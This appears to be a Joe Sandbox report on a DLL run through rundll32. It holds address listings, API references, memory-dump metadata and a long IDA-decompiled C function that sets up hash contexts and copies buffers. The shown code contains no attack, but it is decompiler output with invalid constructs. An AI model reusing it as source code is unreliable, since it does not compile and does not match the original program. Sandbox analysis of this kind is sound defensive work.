                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100099cc
                                                                      0x100099cf
                                                                      0x100099d1
                                                                      0x100099d2
                                                                      0x100099d7
                                                                      0x100099da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100099da
                                                                      0x00000000
                                                                      0x10009830
                                                                      0x10009830
                                                                      0x10009834
                                                                      0x10009838
                                                                      0x1000983b
                                                                      0x10009840
                                                                      0x10009842
                                                                      0x10009844
                                                                      0x10009849
                                                                      0x1000984b
                                                                      0x1000984b
                                                                      0x10009850
                                                                      0x10009853
                                                                      0x10009855
                                                                      0x10009856
                                                                      0x1000985b
                                                                      0x1000985e
                                                                      0x1000985e
                                                                      0x10009830
                                                                      0x1000981e
                                                                      0x10009812
                                                                      0x10009761
                                                                      0x10009761
                                                                      0x10009764
                                                                      0x10009766
                                                                      0x1000976c
                                                                      0x1000976e
                                                                      0x10009771
                                                                      0x10009774
                                                                      0x100099e8
                                                                      0x100099ea
                                                                      0x00000000
                                                                      0x100099f0
                                                                      0x100099f0
                                                                      0x100099f0
                                                                      0x100099f2
                                                                      0x100099f5
                                                                      0x100099f8
                                                                      0x10009a88
                                                                      0x10009a88
                                                                      0x10009a8b
                                                                      0x10009a8d
                                                                      0x00000000
                                                                      0x10009a8d
                                                                      0x100099fe
                                                                      0x10009a01
                                                                      0x00000000
                                                                      0x10009b17
                                                                      0x10009b1a
                                                                      0x10009b1f
                                                                      0x10009b23
                                                                      0x10009b28
                                                                      0x10009b2c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10009aa4
                                                                      0x10009aa7
                                                                      0x10009aac
                                                                      0x10009ab0
                                                                      0x10009ab5
                                                                      0x10009ab9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10009af8
                                                                      0x10009afb
                                                                      0x10009b00
                                                                      0x10009b04
                                                                      0x10009b09
                                                                      0x10009b0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10009adc
                                                                      0x10009adf
                                                                      0x10009ae4
                                                                      0x10009ae9
                                                                      0x10009aed
                                                                      0x10009af1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10009ac0
                                                                      0x10009ac3
                                                                      0x10009ac8
                                                                      0x10009acd
                                                                      0x10009ad1
                                                                      0x10009ad5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10009a92
                                                                      0x10009a92
                                                                      0x10009a96
                                                                      0x10009a97
                                                                      0x10009a97
                                                                      0x00000000
                                                                      0x100099f0
                                                                      0x10009a4d
                                                                      0x00000000
                                                                      0x10009a40
                                                                      0x10009a40
                                                                      0x10009a44
                                                                      0x10009a45
                                                                      0x10009a45
                                                                      0x00000000
                                                                      0x10009a4d
                                                                      0x10009a4d
                                                                      0x10009a4f
                                                                      0x10009c10
                                                                      0x10009c13
                                                                      0x10009c18
                                                                      0x10009c1d
                                                                      0x10009c21
                                                                      0x10009c25
                                                                      0x10009a55
                                                                      0x10009a55
                                                                      0x10009a10
                                                                      0x10009a12
                                                                      0x10009c30
                                                                      0x10009c33
                                                                      0x10009c38
                                                                      0x10009c3c
                                                                      0x10009c41
                                                                      0x10009c45
                                                                      0x10009a18
                                                                      0x10009a18
                                                                      0x10009a1a
                                                                      0x00000000
                                                                      0x10009a20
                                                                      0x10009a20
                                                                      0x10009a23
                                                                      0x10009a28
                                                                      0x10009a2d
                                                                      0x10009a31
                                                                      0x10009a35
                                                                      0x10009a35
                                                                      0x10009a1a
                                                                      0x10009a57
                                                                      0x10009a57
                                                                      0x10009a60
                                                                      0x10009b90
                                                                      0x10009b90
                                                                      0x10009b93
                                                                      0x10009b95
                                                                      0x10009a66
                                                                      0x10009a66
                                                                      0x10009a69
                                                                      0x10009a6e
                                                                      0x10009a73
                                                                      0x10009a77
                                                                      0x10009a7b
                                                                      0x10009a7b
                                                                      0x10009a60
                                                                      0x10009a55
                                                                      0x00000000
                                                                      0x1000977a
                                                                      0x1000977a
                                                                      0x1000977c
                                                                      0x100098ff
                                                                      0x100098ff
                                                                      0x10009901
                                                                      0x10009bd0
                                                                      0x10009bd3
                                                                      0x10009bd8
                                                                      0x10009bdd
                                                                      0x10009be1
                                                                      0x10009be5
                                                                      0x10009907
                                                                      0x10009907
                                                                      0x10009909
                                                                      0x100098e0
                                                                      0x100098e2
                                                                      0x10009bb0
                                                                      0x10009bb3
                                                                      0x10009bb8
                                                                      0x10009bbc
                                                                      0x10009bc1
                                                                      0x10009bc5
                                                                      0x100098e8
                                                                      0x100098e8
                                                                      0x100098eb
                                                                      0x100098ed
                                                                      0x100098ed
                                                                      0x1000990b
                                                                      0x1000990b
                                                                      0x1000990e
                                                                      0x10009913
                                                                      0x10009918
                                                                      0x1000991c
                                                                      0x10009920
                                                                      0x10009920
                                                                      0x10009909
                                                                      0x100098f2
                                                                      0x100098f6
                                                                      0x100098f7
                                                                      0x100098f7
                                                                      0x10009782
                                                                      0x100097cd
                                                                      0x100097cd
                                                                      0x100097cf
                                                                      0x10009bf0
                                                                      0x10009bf3
                                                                      0x10009bf8
                                                                      0x10009bfd
                                                                      0x10009c01
                                                                      0x10009c05
                                                                      0x100097d5
                                                                      0x100097d5
                                                                      0x10009788
                                                                      0x1000978a
                                                                      0x10009c50
                                                                      0x10009c53
                                                                      0x10009c58
                                                                      0x10009c5c
                                                                      0x10009c61
                                                                      0x10009c65
                                                                      0x10009790
                                                                      0x10009790
                                                                      0x10009792
                                                                      0x00000000
                                                                      0x10009798
                                                                      0x10009798
                                                                      0x1000979b
                                                                      0x100097a0
                                                                      0x100097a4
                                                                      0x100097a9
                                                                      0x100097ad
                                                                      0x100097ad
                                                                      0x10009792
                                                                      0x100097d7
                                                                      0x100097d7
                                                                      0x100097e0
                                                                      0x10009b80
                                                                      0x10009b80
                                                                      0x10009b83
                                                                      0x10009b85
                                                                      0x100097e6
                                                                      0x100097e6
                                                                      0x100097e9
                                                                      0x100097ee
                                                                      0x100097f3
                                                                      0x100097f7
                                                                      0x100097fb
                                                                      0x100097fb
                                                                      0x100097e0
                                                                      0x100097d5
                                                                      0x00000000
                                                                      0x100097c0
                                                                      0x100097c0
                                                                      0x100097c4
                                                                      0x100097c5
                                                                      0x100097c5
                                                                      0x100097cd
                                                                      0x1000977c
                                                                      0x10009774
                                                                      0x10009766
                                                                      0x10009869
                                                                      0x10009869
                                                                      0x10009869
                                                                      0x00000000

                                                                      APIs
                                                                      • mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097AD
                                                                      • mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
                                                                      • strchr.MSVCRT ref: 1000983B
                                                                      • mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009920
                                                                      • mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C05
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprintf$strchr
                                                                      • String ID: &amp;$&apos;$&gt;$&lt;$&quot;$'\''
                                                                      • API String ID: 2626076477-3929336650
                                                                      • Opcode ID: 4d3215f32d1e7072e86e6aa446e4fa65e4d3290bde3b119a889ed9f3e12215f6
                                                                      • Instruction ID: 4cad4ceb1349a5dbac3916fb8057f47bb241a6bf44f33620574422d9e36815b4
                                                                      • Opcode Fuzzy Hash: 4d3215f32d1e7072e86e6aa446e4fa65e4d3290bde3b119a889ed9f3e12215f6
                                                                      • Instruction Fuzzy Hash: 49D16D74908B91CBE710DF69808036EBBE1FB826C0F55885EE9D58B24ADB35D945CB83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_log
                                                                      • String ID: -DBL_MAX$-DBL_MIN$-FLT_MAX$-FLT_MIN$DBL_MAX$DBL_MIN$FLT_MAX$FLT_MIN$I64_MAX$I64_MIN$INT_MAX$INT_MIN$UINT32_MAX
                                                                      • API String ID: 2418673259-2628725902
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID: _errnomv_callocmv_freep$ByteCharMultiWidewcscatwcscpywcslen$_sopen_wsopen
                                                                      • String ID: \\?\$\\?\UNC\
                                                                      • API String ID: 2585690843-3019864461
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 34%
                                                                      			E1001C790(void* __ecx, void* __edx, void* __eflags) {
                                                                      				void* _t1171;
                                                                      				void* _t1172;
                                                                      				void* _t1173;
                                                                      				signed int _t1178;
                                                                      				void* _t1184;
                                                                      				void* _t1185;
                                                                      				void* _t1189;
                                                                      				void* _t1194;
                                                                      				void* _t1197;
                                                                      				void** _t1198;
                                                                      
                                                                      				_t1171 = 0x100b5e05;
                                                                      				_t1178 = 0;
                                                                      				_t1198 = _t1197 - 0x1c;
                                                                      				_t1194 = _t1198[0xc];
                                                                      				_t1184 = _t1198[0xd];
                                                                      				 *_t1194 = 0;
                                                                      				while(1) {
                                                                      					_t1198[1] = _t1171;
                                                                      					 *_t1198 = _t1184;
                                                                      					_t1172 = L10006B30();
                                                                      					_t1189 = _t1172;
                                                                      					if(_t1172 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t1178 = _t1178 + 1;
                                                                      					if(_t1178 != 0xf) {
                                                                      						_t1171 =  *(0x100b6000 + _t1178 * 8);
                                                                      						continue;
                                                                      					} else {
                                                                      						return 0xffffffea;
                                                                      					}
                                                                      					L457:
                                                                      				}
                                                                      				 *_t1198 = 0x10;
                                                                      				_t1173 = E10029100();
                                                                      				_t1185 = _t1173;
                                                                      				if(_t1173 == 0) {
                                                                      					L18:
                                                                      					_t1189 = 0xfffffff4;
                                                                      					goto L11;
                                                                      				} else {
                                                                      					 *(_t1173 + 4) = _t1178;
                                                                      					if(_t1178 > 0xd) {
                                                                      						L10:
                                                                      						 *_t1194 = _t1185;
                                                                      						goto L11;
                                                                      					} else {
                                                                      						switch( *((intOrPtr*)(_t1178 * 4 +  &M100B5E0C))) {
                                                                      							case 0:
                                                                      								__eax = E10028790();
                                                                      								goto L9;
                                                                      							case 1:
                                                                      								__eax = L10029FC0();
                                                                      								goto L9;
                                                                      							case 2:
                                                                      								__eax = E1003C470();
                                                                      								goto L9;
                                                                      							case 3:
                                                                      								__eax = E100411A0();
                                                                      								goto L9;
                                                                      							case 4:
                                                                      								_t1175 = E1004C260();
                                                                      								L9:
                                                                      								 *_t1185 = _t1175;
                                                                      								if(_t1175 == 0) {
                                                                      									 *_t1198 = _t1185;
                                                                      									L100290D0();
                                                                      									goto L18;
                                                                      								} else {
                                                                      									goto L10;
                                                                      								}
                                                                      								L11:
                                                                      								return _t1189;
                                                                      								goto L457;
                                                                      							case 5:
                                                                      								 *(__edi + 8) = L1000FDB0(__ebx, 4);
                                                                      								goto L10;
                                                                      							case 6:
                                                                      								__esp[8] = __eax;
                                                                      								__esp =  &(__esp[7]);
                                                                      								__eax = __esp[1];
                                                                      								 *__eax = 0;
                                                                      								 *(__eax + 4) = 0;
                                                                      								 *((intOrPtr*)(__eax + 0x48)) = 0x10325476;
                                                                      								 *((intOrPtr*)(__eax + 0x4c)) = 0x98badcfe;
                                                                      								 *((intOrPtr*)(__eax + 0x50)) = 0xefcdab89;
                                                                      								 *((intOrPtr*)(__eax + 0x54)) = 0x67452301;
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 7:
                                                                      								__esp[8] = __eax;
                                                                      								__esp =  &(__esp[7]);
                                                                      								__esp = __esp - 0xc;
                                                                      								__esp[1] = __esi;
                                                                      								__ecx = __esp[4];
                                                                      								__esi = 0;
                                                                      								 *__esp = __ebx;
                                                                      								__ebx = 0x20;
                                                                      								__esp[2] = __edi;
                                                                      								__eax = 0x10 + __ecx;
                                                                      								if((__cl & 0x00000001) != 0) {
                                                                      									 *(0x10 + __ecx) = 0;
                                                                      									__eax = __ecx + 0x11;
                                                                      									__ebx = 0x1f;
                                                                      								}
                                                                      								if((__al & 0x00000002) != 0) {
                                                                      									 *__eax = 0;
                                                                      									__ebx = __ebx - 2;
                                                                      									__eax = __eax + 2;
                                                                      								}
                                                                      								__edi = __ebx;
                                                                      								__edx = 0;
                                                                      								__edi = __ebx & 0xfffffff8;
                                                                      								do {
                                                                      									 *(__eax + __edx) = __esi;
                                                                      									 *(__eax + __edx + 4) = __esi;
                                                                      									__edx = 8 + __edx;
                                                                      								} while (__edx < __edi);
                                                                      								__eax = __eax + __edx;
                                                                      								if((__bl & 0x00000004) != 0) {
                                                                      									 *__eax = 0;
                                                                      									__eax = __eax + 4;
                                                                      									if((__bl & 0x00000002) == 0) {
                                                                      										goto L145;
                                                                      									} else {
                                                                      										goto L148;
                                                                      									}
                                                                      								} else {
                                                                      									if((__bl & 0x00000002) != 0) {
                                                                      										L148:
                                                                      										 *__eax = 0;
                                                                      										__eax = __eax + 2;
                                                                      										if((__bl & 0x00000001) != 0) {
                                                                      											goto L147;
                                                                      										}
                                                                      									} else {
                                                                      										L145:
                                                                      										if((__bl & 0x00000001) != 0) {
                                                                      											L147:
                                                                      											 *__eax = 0;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								__ebx =  *__esp;
                                                                      								 *(8 + __ecx) = 0xdaddca55;
                                                                      								__esi = __esp[1];
                                                                      								 *(__ecx + 0xc) = 0x725acc55;
                                                                      								__edi = __esp[2];
                                                                      								 *__ecx = 0xdaddca55;
                                                                      								 *(__ecx + 4) = 0x725acc55;
                                                                      								__esp =  &(__esp[3]);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 8:
                                                                      								__edx = 0x80;
                                                                      								__esp[1] = 0x80;
                                                                      								 *__esp = __eax;
                                                                      								__eax = L100A7F8C();
                                                                      								goto L20;
                                                                      							case 9:
                                                                      								__ecx = 0xa0;
                                                                      								__esp[1] = 0xa0;
                                                                      								 *__esp = __eax;
                                                                      								__eax = L100A7F8C();
                                                                      								goto L20;
                                                                      							case 0xa:
                                                                      								__edx = 0x100;
                                                                      								__esp[1] = 0x100;
                                                                      								 *__esp = __eax;
                                                                      								__eax = L100A7F8C();
                                                                      								goto L20;
                                                                      							case 0xb:
                                                                      								__ecx = 0x140;
                                                                      								__esp[1] = 0x140;
                                                                      								 *__esp = __eax;
                                                                      								__eax = L100A7F8C();
                                                                      								goto L20;
                                                                      							case 0xc:
                                                                      								__edx = 0xa0;
                                                                      								__esp[1] = 0xa0;
                                                                      								 *__esp = __eax;
                                                                      								__eax = E100A80B4();
                                                                      								goto L20;
                                                                      							case 0xd:
                                                                      								__ecx = 0xe0;
                                                                      								__esp[1] = 0xe0;
                                                                      								 *__esp = __eax;
                                                                      								__eax = E100A80B4();
                                                                      								goto L20;
                                                                      							case 0xe:
                                                                      								__edx = 0x100;
                                                                      								__esp[1] = 0x100;
                                                                      								 *__esp = __eax;
                                                                      								__eax = E100A80B4();
                                                                      								goto L20;
                                                                      							case 0xf:
                                                                      								__ecx = 0xe0;
                                                                      								__esp[1] = 0xe0;
                                                                      								 *__esp = __eax;
                                                                      								__eax = E100A81B0();
                                                                      								goto L20;
                                                                      							case 0x10:
                                                                      								__edx = 0x100;
                                                                      								__esp[1] = 0x100;
                                                                      								 *__esp = __eax;
                                                                      								__eax = E100A81B0();
                                                                      								goto L20;
                                                                      							case 0x11:
                                                                      								__ecx = 0x180;
                                                                      								__esp[1] = 0x180;
                                                                      								 *__esp = __eax;
                                                                      								__eax = E100A81B0();
                                                                      								goto L20;
                                                                      							case 0x12:
                                                                      								__edx = 0x200;
                                                                      								__esp[1] = 0x200;
                                                                      								 *__esp = __eax;
                                                                      								__eax = E100A81B0();
                                                                      								goto L20;
                                                                      							case 0x13:
                                                                      								 *(__eax + 0xc) = 0xffffffff;
                                                                      								goto L20;
                                                                      							case 0x14:
                                                                      								 *(__eax + 0xc) = 1;
                                                                      								L20:
                                                                      								__esp =  &(__esp[7]);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x15:
                                                                      								__esp[0xa] = __ecx;
                                                                      								__esp[9] = __edx;
                                                                      								__eax =  *__ebx;
                                                                      								__ebx = __esp[6];
                                                                      								__esp[8] = __eax;
                                                                      								__esp =  &(__esp[7]);
                                                                      								__esp = __esp - 0x24;
                                                                      								__esp[5] = __ebx;
                                                                      								__ebx = __esp[0xa];
                                                                      								__esp[8] = __ebp;
                                                                      								__ebp = __esp[0xc];
                                                                      								__esp[6] = __esi;
                                                                      								__esp[7] = __edi;
                                                                      								__edi = 0;
                                                                      								__eax =  *__ebx;
                                                                      								__edx =  *(__ebx + 4);
                                                                      								__ebp = __eax + __ebp;
                                                                      								 *__ebx = __eax + __ebp;
                                                                      								asm("adc edi, edx");
                                                                      								__eax = __eax & 0x0000003f;
                                                                      								 *(__ebx + 4) = 0;
                                                                      								 *__esp = __eax;
                                                                      								if(__eax != 0) {
                                                                      									__edx = 0x40;
                                                                      									__edi = __eax;
                                                                      									__esi = __esp[0xb];
                                                                      									__edi = __ebx + __eax + 8;
                                                                      									__edx = 0x40 - __eax;
                                                                      									__eax = 8 + __ebx;
                                                                      									__esp[2] = 8 + __ebx;
                                                                      									__edx =  >  ? __ebp : __edx;
                                                                      									__esp[1] = 0x40;
                                                                      									if(0x40 >= 4) {
                                                                      										if((__edi & 0x00000001) != 0) {
                                                                      											__eax =  *__esi & 0x000000ff;
                                                                      											__edi = __edi + 1;
                                                                      											 *(__edi - 1) = __al;
                                                                      											__eax = __esp[0xb];
                                                                      											__esi = __esp[0xb] + 1;
                                                                      											_t232 = __edx - 1; // 0x3f
                                                                      											__eax = _t232;
                                                                      											__esp[1] = _t232;
                                                                      										}
                                                                      										if((__edi & 0x00000002) != 0) {
                                                                      											__eax =  *__esi & 0x0000ffff;
                                                                      											__edi = __edi + 2;
                                                                      											__esi = __esi + 2;
                                                                      											 *(__edi - 2) = __ax;
                                                                      											__esp[1] = __esp[1] - 2;
                                                                      										}
                                                                      										__eax = __esp[1];
                                                                      										if(__eax >= 4) {
                                                                      											__esp[3] = __edx;
                                                                      											__eax = __eax & 0xfffffffc;
                                                                      											__ecx = 0;
                                                                      											__edx = __eax;
                                                                      											do {
                                                                      												__eax =  *(__esi + __ecx);
                                                                      												 *(__edi + __ecx) =  *(__esi + __ecx);
                                                                      												__ecx = __ecx + 4;
                                                                      											} while (__ecx < __edx);
                                                                      											__edx = __esp[3];
                                                                      											__edi = __edi + __ecx;
                                                                      											__esi = __esi + __ecx;
                                                                      										}
                                                                      									}
                                                                      									__ecx = 0;
                                                                      									if((__esp[1] & 0x00000002) != 0) {
                                                                      										__eax =  *__esi & 0x0000ffff;
                                                                      										__ecx = 2;
                                                                      										 *__edi = __ax;
                                                                      									}
                                                                      									if((__esp[1] & 0x00000001) != 0) {
                                                                      										__eax =  *(__esi + __ecx) & 0x000000ff;
                                                                      										 *(__edi + __ecx) = __al;
                                                                      									}
                                                                      									__eax =  *__esp;
                                                                      									__eax =  *__esp + __edx;
                                                                      									if(__eax > 0x3f) {
                                                                      										__esp[0xb] = __esp[0xb] + __edx;
                                                                      										__ebp = __ebp - __edx;
                                                                      										__edx = __esp[2];
                                                                      										__eax = __ebx + 0x48;
                                                                      										__ecx = 1;
                                                                      										 *__esp = __eax;
                                                                      										__eax = E10028070(__eax, 1, __esp[2]);
                                                                      										__eax =  *__esp;
                                                                      										goto L100;
                                                                      									}
                                                                      								} else {
                                                                      									__eax = __ebx + 0x48;
                                                                      									L100:
                                                                      									__edx = __esp[0xb];
                                                                      									__ecx = __ebp;
                                                                      									__ecx = __ebp >> 6;
                                                                      									__eax = __ebp;
                                                                      									__eax = __ebp & 0x0000003f;
                                                                      									if(__eax != 0) {
                                                                      										__edi = __esp[0xb];
                                                                      										__ecx = 8 + __ebx;
                                                                      										__esi = __esp[0xb] + __ebp;
                                                                      										if(__eax >= 4) {
                                                                      											if((__cl & 0x00000001) != 0) {
                                                                      												__ecx =  *__esi & 0x000000ff;
                                                                      												__eax = __eax - 1;
                                                                      												__esi = __esi + 1;
                                                                      												 *(8 + __ebx) = __cl;
                                                                      												__ecx = __ebx + 9;
                                                                      											}
                                                                      											if((__cl & 0x00000002) != 0) {
                                                                      												__edi =  *__esi & 0x0000ffff;
                                                                      												__ecx = __ecx + 2;
                                                                      												__esi = __esi + 2;
                                                                      												__eax = __eax - 2;
                                                                      												 *(__ecx - 2) = __di;
                                                                      											}
                                                                      											if(__eax >= 4) {
                                                                      												__edi = __eax;
                                                                      												__edx = 0;
                                                                      												__edi = __eax & 0xfffffffc;
                                                                      												do {
                                                                      													__ebx =  *(__esi + __edx);
                                                                      													 *(__ecx + __edx) =  *(__esi + __edx);
                                                                      													__edx = __edx + 4;
                                                                      												} while (__edx < __edi);
                                                                      												__ecx = __ecx + __edx;
                                                                      												__esi = __esi + __edx;
                                                                      											}
                                                                      										}
                                                                      										__edx = 0;
                                                                      										if((__al & 0x00000002) != 0) {
                                                                      											__edi =  *__esi & 0x0000ffff;
                                                                      											__edx = 2;
                                                                      											 *__ecx = __di;
                                                                      											if((__al & 0x00000001) != 0) {
                                                                      												goto L105;
                                                                      											}
                                                                      										} else {
                                                                      											if((__al & 0x00000001) != 0) {
                                                                      												L105:
                                                                      												__eax =  *(__esi + __edx) & 0x000000ff;
                                                                      												 *(__ecx + __edx) = __al;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								__ebx = __esp[5];
                                                                      								__esi = __esp[6];
                                                                      								__edi = __esp[7];
                                                                      								__ebp = __esp[8];
                                                                      								__esp =  &(__esp[9]);
                                                                      								return __eax;
                                                                      								goto L457;
                                                                      							case 0x16:
                                                                      								__esp[0xa] = __ecx;
                                                                      								__esp[9] = __edx;
                                                                      								__eax =  *__ebx;
                                                                      								__ebx = __esp[6];
                                                                      								__esp[8] = __eax;
                                                                      								__esp =  &(__esp[7]);
                                                                      								_push(__ebp);
                                                                      								_push(__edi);
                                                                      								_push(__esi);
                                                                      								_push(__ebx);
                                                                      								__esp = __esp - 0x2c;
                                                                      								__ecx = __esp[0x10];
                                                                      								__edi = __esp[0x12];
                                                                      								__ebx = __esp[0x11];
                                                                      								__eax =  *__ecx;
                                                                      								__edx =  *(__ecx + 4);
                                                                      								 *__esp =  *__ecx;
                                                                      								__eax =  *(8 + __ecx);
                                                                      								__esp[1] =  *(__ecx + 4);
                                                                      								__edx =  *(__ecx + 0xc);
                                                                      								__esp[4] = __eax;
                                                                      								__esp[5] =  *(__ecx + 0xc);
                                                                      								if(__esp[0x12] == 0) {
                                                                      									L193:
                                                                      									__esp =  &(__esp[0xb]);
                                                                      									_pop(__ebx);
                                                                      									_pop(__esi);
                                                                      									_pop(__edi);
                                                                      									_pop(__ebp);
                                                                      									return __eax;
                                                                      								} else {
                                                                      									__eax = __esp[0x12];
                                                                      									__edx = 0;
                                                                      									 *((intOrPtr*)(__ecx + 0x28)) =  *((intOrPtr*)(__ecx + 0x28)) + __esp[0x12];
                                                                      									__eax =  *(__ecx + 0x20);
                                                                      									asm("adc [ecx+0x2c], edx");
                                                                      									if(__eax <= 0) {
                                                                      										L188:
                                                                      										__eax = __esp[0x12];
                                                                      										__eax = __esp[0x12] & 0xfffffff0;
                                                                      										__esp[9] = __eax;
                                                                      										__eax = __eax + __ebx;
                                                                      										__esp[6] = __eax;
                                                                      										if(__ebx < __eax) {
                                                                      											__esi =  *__esp;
                                                                      											__ebp = __ebx;
                                                                      											__esp[0x10] = __ecx;
                                                                      											__edi = __esp[1];
                                                                      											__esp[0x11] = __ebx;
                                                                      											do {
                                                                      												__eax =  *__ebp;
                                                                      												__ebx = 0x114253d5;
                                                                      												__ecx =  *(__ebp + 4) * 0x114253d5;
                                                                      												__edx = __eax * 0x87c37b91;
                                                                      												__ecx =  *(__ebp + 4) * 0x114253d5 + __eax * 0x87c37b91;
                                                                      												__edx = __eax * 0x114253d5 >> 0x20;
                                                                      												__eax = __eax * 0x114253d5;
                                                                      												__ebx = 0x2745937f;
                                                                      												__ecx = __edx;
                                                                      												__edx = __eax;
                                                                      												__edx = (__eax << 0x00000020 | __ecx) << 0x1f;
                                                                      												__esp[2] = (__eax << 0x00000020 | __ecx) << 0x1f;
                                                                      												__ecx = (__ecx << 0x00000020 | __eax) << 0x1f;
                                                                      												__eax =  *(8 + __ebp);
                                                                      												__esp[3] = __ecx;
                                                                      												__ecx =  *(__ebp + 0xc) * 0x2745937f;
                                                                      												__edx = __eax * 0x4cf5ad43;
                                                                      												__ecx =  *(__ebp + 0xc) * 0x2745937f + __eax * 0x4cf5ad43;
                                                                      												__edx = __eax * 0x2745937f >> 0x20;
                                                                      												__eax = __eax * 0x2745937f;
                                                                      												__edx = __edx + __ecx;
                                                                      												__ecx = __eax;
                                                                      												__ecx = (__edx << 0x00000020 | __eax) >> 0x1f;
                                                                      												__ebx = __edx;
                                                                      												__edx = __esp[3];
                                                                      												 *__esp = __ecx;
                                                                      												__ebx = (__eax << 0x00000020 | __ebx) >> 0x1f;
                                                                      												__eax = __esp[2] * 0x4cf5ad43;
                                                                      												__esp[1] = __ebx;
                                                                      												__ebx = 5;
                                                                      												__esp[3] * 0x2745937f = __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43;
                                                                      												__eax = 0x2745937f;
                                                                      												__edx = 0x2745937f * __esp[2] >> 0x20;
                                                                      												__eax = 0x2745937f * __esp[2];
                                                                      												__edx = (0x2745937f * __esp[2] >> 0x20) + __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43;
                                                                      												__eax = 0x2745937f * __esp[2] ^ __esi;
                                                                      												__edx = (0x2745937f * __esp[2] >> 0x00000020) + __esp[3] * 0x2745937f + __esp[2] * 0x4cf5ad43 ^ __edi;
                                                                      												__ecx = __eax;
                                                                      												__eax = (__eax << 0x00000020 | __edx) << 0x1b;
                                                                      												__edx = (__edx << 0x00000020 | __ecx) << 0x1b;
                                                                      												__eax = __eax + __esp[4];
                                                                      												asm("adc edx, [esp+0x14]");
                                                                      												__ecx = __edx + __edx * 4;
                                                                      												__edx = __eax * 5 >> 0x20;
                                                                      												__eax = __eax * 5;
                                                                      												__edx = __edx + __ecx;
                                                                      												__esi = __eax;
                                                                      												__edi = __edx;
                                                                      												__edx = __esp[1];
                                                                      												__esi = __eax + 0x52dce729;
                                                                      												asm("adc edi, 0x0");
                                                                      												__eax =  *__esp * 0x87c37b91;
                                                                      												__esp[1] * 0x114253d5 = __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91;
                                                                      												__eax = 0x114253d5;
                                                                      												__edx = 0x114253d5 *  *__esp >> 0x20;
                                                                      												__eax = 0x114253d5 *  *__esp;
                                                                      												__edx = (0x114253d5 *  *__esp >> 0x20) + __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91;
                                                                      												__ecx = __esp[4];
                                                                      												__eax = 0x114253d5 *  *__esp ^ __esp[4];
                                                                      												__ecx = __esp[5];
                                                                      												__edx = (0x114253d5 *  *__esp >> 0x00000020) + __esp[1] * 0x114253d5 +  *__esp * 0x87c37b91 ^ __esp[5];
                                                                      												__ecx = __eax;
                                                                      												__eax = (__eax << 0x00000020 | __edx) << 0x1f;
                                                                      												__edx = (__edx << 0x00000020 | __ecx) << 0x1f;
                                                                      												__eax = __eax + __esi;
                                                                      												asm("adc edx, edi");
                                                                      												__ecx = __edx + __edx * 4;
                                                                      												__edx = __eax * 5 >> 0x20;
                                                                      												__eax = __eax * 5;
                                                                      												__edx = __edx + __ecx;
                                                                      												__esp[4] = __eax;
                                                                      												__eax = __esp[6];
